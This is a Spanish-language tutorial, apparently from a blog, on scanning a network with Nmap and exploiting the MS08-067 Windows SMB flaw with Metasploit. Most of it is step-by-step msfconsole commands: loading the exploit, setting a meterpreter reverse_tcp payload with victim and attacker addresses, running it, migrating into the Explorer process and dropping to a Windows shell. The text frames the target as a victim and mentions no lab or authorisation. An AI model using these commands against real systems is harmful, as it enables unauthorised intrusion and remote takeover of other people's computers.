DETECTANDO UNA VULNERABILIDAD CON NMAP Y EXPLOTANDOLA CON METASPLOIT
En esta guía veremos rápidamente un ejemplo de como detectar un par de vulnerabilidades en windows con Nmap y explotar una de ellas con comandos en Metasploit.
Procedemos a escanear los puertos la maquina por medio de de la ip con el comando Nmap y la IP. de la PC a escanear, en este caso por ser un ejemplo se trata de una localhost.
Vulnerabilidades halladas :
|
Amenaza Alta
-Puerto
135 -Abierto - Ejecutando servicio Microsoft Remote
Procedure Call
Exploit :
-msrpc_dcom_ms03_026:
(MS03-026 Desbordamiento de interfaz Microsoft RPC DCOM)
Este modulo explota un desbordamiento de buffer de pila en el
servicio RPCSS
Payload : - Uno de los posibles payloads a utilizar es el “reverse_meterpreter” que
permite cargar una shell meta interprete de ordenes en el equipo de la
victima tomando el control de los procesos y la cmd de la victima entre otras
acciones maliciosas.
|
Amenaza critica
-Puerto
445 -Abierto Ejecutando Servicio Microsoft-ds
Exploit : -
ms08_067_netapi
Payload: - meterpreter/reverse_tcp
---------------------------------------------------------------------------------------------------------------
EXPLOTACION
En este caso explotaremos la vulnerabilidad hallada en el puerto 445 que se encuentra ejecutando "Microsoft-ds" por medio del exploit "ms08_067_netapi" al cual le estableceremos el payload "meterpreter/reverse_tcp".
-ESCANEANDO
root-bt:~# nmap -sP 192.168.1.0-255 [enter]
Esto suponiendo que estamos en la red
192.168.0.0
Esperamos a que termine el escaneo, si
encontramos una IP con el puerto 445/tcp Microsoft-ds, es un computador que
posee una vulnerabilidad.
EXPLOTANDO CON COMANDOS EN METASPLOIT
root-bt:~#msfconsole [enter]
Esperamos unos minutos a que se carge la consola.
msf> search
windows/smb/ms [enter]
Un vez finalizado el search, debemos buscar el exploit exploit/windows/smb/ms08_067_netapi.
msf> use
exploit/windows/smb/ms08_067_netapi [enter]
msf> exploit
(ms08_067_netapi) > set
payload windows/meterpreter/reverse_tcp [enter]
De este modo la pc de la victima se
conectara a usted y no usted a ella, por otra parte debemos especificar los
host remotos y locales.
msf> exploit
(ms08_067_netapi) > show
options [enter]
msf> exploit
(ms08_067_netapi) > set
rhost ip_address_victima [enter]
msf> exploit
(ms08_067_netapi) > set
lhost ip_address_atacante [enter]
Ahora para ejecutar finalmente el Exploit :
msf> exploit
(ms08_067_netapi) > exploit
[enter]
Si temenos exito, debe aparecer una un prompt
como este:
meterpreter> _
Si es así, ejecute el siguiente comando para
determinar cual es su PID (Proceso ID).
meterpreter> pid
[enter]
meterpreter> ps
[enter] // Para ver los procesos, y emigrarlo por ejemplo al proceso de "Explorer" que permanece abierto
meterpreter> migrate
[pid explorer] [enter]
Este ultimo comando para entrar al Shell de
Windows/System32
meterpreter> shell
[enter]
TUT0RIAL
|
Share this